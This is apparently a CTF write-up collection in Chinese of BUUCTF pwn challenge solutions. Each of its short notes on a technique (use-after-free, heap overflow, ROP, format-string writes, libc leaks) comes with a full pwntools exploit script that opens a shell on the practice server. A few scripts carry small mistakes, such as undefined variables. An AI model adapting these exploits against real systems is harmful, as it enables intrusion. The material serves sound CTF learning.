BUUCTF pwn水题大赏
[BJDCTF2nd]ydsneedgirlfriend2
UAF漏洞,把 print
的位置覆盖成 backdoor
的地址,然后 show
就可以跳转到 backdoor
exp:
from pwn import*
context(arch='amd64',os='linux')
context.log_level = 'DEBUG'
#p=process('./ydsneedgirlfriend2')
p=remote('node3.buuoj.cn',29604)
flag=0x400D86
def add(length,name):
p.sendlineafter('choice :', str(1))
p.sendlineafter('the length of her name:', str(length))
p.sendafter('her name:', name)
def dele(index):
p.sendlineafter('choice :', str(2))
p.sendlineafter('Index :',str(index))
def show(index):
p.sendlineafter('choice :', str(3))
p.sendlineafter('Index :',str(index))
add(0x30,'0')
add(0x10,'1')
dele(0)
add(0x10,p64(0x400D86)*2)
show(0)
#gdb.attach(p)
p.interactive()
babyheap_0ctf_2017
堆溢出
exp:
from pwn import*
context(log_level="debug")
context(arch='amd64',os='linux')
p=remote('node3.buuoj.cn',26222)
#p=process('./babyheap_0ctf_2017')
elf=ELF('./babyheap_0ctf_2017')
def add(size):
p.sendlineafter(': ','1')
p.sendlineafter('Size: ',str(size))
def edit(index,size,content):
p.sendlineafter(':','2')
p.sendlineafter('Index: ',str(index))
p.sendlineafter('Size: ',str(size))
p.sendlineafter('Content: ',content)
def free(index):
p.sendlineafter(':','3')
p.sendlineafter('Index: ',str(index))
def show(index):
p.sendlineafter(':','4')
p.sendlineafter('Index: ',str(index))
def exit():
p.sendlineafter(':','5')
add(0x10)#0
add(0x10)#1
add(0x10)#2
add(0x10)#3
add(0x80)#4
free(1)
free(2)
payload=p64(0)*3+p64(0x21)+p64(0)*3+p64(0x21)+p8(0x80)
edit(0,len(payload),payload)
payload1=p64(0)*3+p64(0x21)
edit(3,len(payload1),payload1)
add(0x10)#1
add(0x10)#2
edit(1,4,'aaaa')
edit(2,4,'aaaa')
payload2=p64(0)*3+p64(0x91)
edit(3,len(payload2),payload2)
add(0x80)#5
free(4)
show(2)
leak=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base=leak-0x3c4b78
print hex(libc_base)
print hex(leak)
add(0x60)#4
free(4)
payload3=p64(libc_base+0x3c4aed)
edit(2,len(payload3),payload3)
print hex(libc_base+0x3c4aed)
add(0x60)#4
add(0x60)#6
payload4=p8(0)*3+p64(0)*2+p64(libc_base+0x4526a)
edit(6,len(payload4),payload4)
add(255)
#gdb.attach(p)
p.interactive()
ciscn_2019_ne_5
system
函数的参数是 sh
的时候也可以得到权限( sh
用 gdb
的指令 find sh
找)
exp:
from pwn import*
context.log_level = 'DEBUG'
p=remote('node3.buuoj.cn',27800)
#p=process('./ciscn_2019_ne_5')
elf=ELF('./ciscn_2019_ne_5')
sys=0x80484D0
sh=0x80492ea
#gdb.attach(p)
p.sendlineafter('Please input admin password:','administrator')
payload='a'*0x48+'bbbb'+p32(sys)*2+p32(sh)
p.sendlineafter(':','1')
p.sendlineafter('info:',payload)
p.sendlineafter(':','4')
p.interactive()
[HarekazeCTF2019]baby_rop2
通过 printf
泄露 libc
,然后栈溢出( flag
在 home
文件里,可以用 find -name 'flag'
找)
exp:
from pwn import*
from LibcSearcher import*
context.log_level='debug'
#p=process('./babyrop2')
p=remote("node3.buuoj.cn",28858)
elf=ELF('babyrop2')
printf_plt=elf.plt['printf']
read_got=elf.got['read']
main_plt=elf.sym['main']
pop_rdi=0x0000000000400733
pop_rsi_r15=0x0000000000400731
format_str=0x0000000000400770
ret_addr=0x0000000000400734
payload='a'*0x28+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt)
p.recvuntil("name? ")
p.sendline(payload)
read_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(read_addr)
libc=LibcSearcher('read', read_addr)
libc_base=read_addr-libc.dump('read')
print hex(libc_base)
sys_addr=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
payload='a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)+p64(0)
p.sendline(payload)
p.interactive()
jarvisoj_fm
改 x=4
,找对 printf
,多 gdb
调试,偏移 11
exp:
from pwn import*
p=remote('node3.buuoj.cn',25621)
#p=process('./fm')
x=0x0804A02C
payload=p32(x)+'%11$n'
p.sendline(payload)
p.interactive()
pwn2_sctf_2016
用负数绕过 if
,用 printf
泄露 libc
exp:
from pwn import*
from LibcSearcher import*
context.log_level = 'DEBUG'
p=remote('node3.buuoj.cn',28484)
#p=process('./pwn2_sctf_2016')
elf=ELF('./pwn2_sctf_2016')
format_str=0x080486F8
printf_plt=elf.plt['printf']
main_addr=elf.symbols['main']
printf_got=elf.got['printf']
p.recvuntil('read? ')
p.sendline('-1')
p.recvuntil('data!\n')
payload1='a'*0x30+p32(printf_plt)+p32(main_addr)+p32(format_str)+p32(printf_got)
p.sendline(payload1)
p.recvuntil('said: ')
p.recvuntil('said: ')
printf_addr = u32(p.recv(4))
print hex(printf_addr)
#gdb.attach(p)
libc = LibcSearcher('printf', printf_addr)
libc_base=printf_addr-libc.dump('printf')
print hex(libc_base)
sys=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')
p.recvuntil('read? ')
p.sendline('-1')
p.recvuntil('data!\n')
payload2='a'*0x30+p32(sys)+p32(main_addr)+p32(binsh)
p.sendline(payload2)
p.interactive()
jarvisoj_tell_me_something
栈溢出到 good_game
函数
exp:
from pwn import *
p=remote("node3.buuoj.cn","27384")
payload='a'*136+p64(0x0000000000400620)
p.recvuntil("\n")
p.send(payload)
p.interactive()
picoctf_2018_rop chain
gets
溢出给 win_function1
和 win_functinon2
的参数赋值,然后符合了 flag
函数的调用条件
exp:
from pwn import*
p=remote('node3.buuoj.cn',27082)
win=0x080485CB
win=0x080485D8
flag=0x0804862B
payload='a'*0x1c+p32(win1)+p32(win2)+p32(flag)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
p.sendlineafter('input> ',payload)
p.interactive()
cmcc_simplerop
栈溢出,将 /bin/sh
写入 bss
段,再系统调用
exp:
from pwn import*
#p=process('./simplerop')
p=remote('node3.buuoj.cn',29587)
pop_eax_ret=0x80bae06
pop_bcdx_ret=0x806e850
int_80=0x806EEF0
bss=0x80EB010
payload='a'*0x20+p32(pop_eax_ret)+p32(3)+p32(pop_bcdx_ret)+p32(8)+p32(bss)+p32(0)+p32(int_80)+p32(pop_eax_ret)+p32(11)+p32(pop_bcdx_ret)+p32(0)+p32(0)+p32(bss)+p32(int_80)
p.sendline(payload)
p.send('/bin/sh')
sleep(0.1)
p.interactive()
[ZJCTF 2019]Login
c++题目,用户名为 admin
,密码为 2jctf_pa5sw0rd
,然后栈溢出到 /bin/sh
exp:
from pwn import*
p = remote('node3.buuoj.cn',26877)
p.sendlineafter('username: ','admin')
payload = '2jctf_pa5sw0r'+'\x00'*58+p64(0x400E88)
p.sendlineafter('password: ',payload)
p.interactive()